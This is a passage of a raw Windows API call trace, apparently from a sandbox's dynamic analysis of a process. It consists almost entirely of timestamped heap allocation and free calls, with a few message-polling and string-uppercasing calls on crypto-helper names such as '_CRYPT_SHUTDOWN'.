0x2f15178 [0266.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0266.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0266.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0266.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0266.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0266.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.162] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.162] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0266.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0266.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15178 | out: hHeap=0x970000) returned 1 [0266.163] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0266.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0266.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0266.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0266.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0266.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0266.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0266.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0266.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0266.163] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0266.163] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.164] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0266.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0266.164] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0266.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0266.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0266.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0266.164] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0266.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0266.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0266.164] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0266.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0266.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518c8 [0266.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.164] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0266.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0266.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0266.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0266.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0266.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51970 [0266.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0266.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0266.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0266.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518e0 [0266.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0266.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0266.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0266.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0266.166] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0266.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.166] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0266.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.166] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a60 [0266.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.166] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0266.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0266.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0266.166] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0266.166] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0266.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0266.167] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0266.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0266.167] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0266.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0266.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.167] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0266.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0266.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0266.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0266.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.167] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0266.167] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0266.167] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0266.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.168] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0266.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0266.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0266.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0266.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.168] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.169] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0266.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0266.170] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0266.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.170] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0266.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0266.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0266.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0266.170] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0266.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0266.170] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0266.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.170] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0266.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0266.170] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.170] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0266.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0266.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0266.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0266.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0266.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0266.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0266.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0266.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0266.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0266.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0266.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515c8 [0266.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0266.171] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0266.171] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 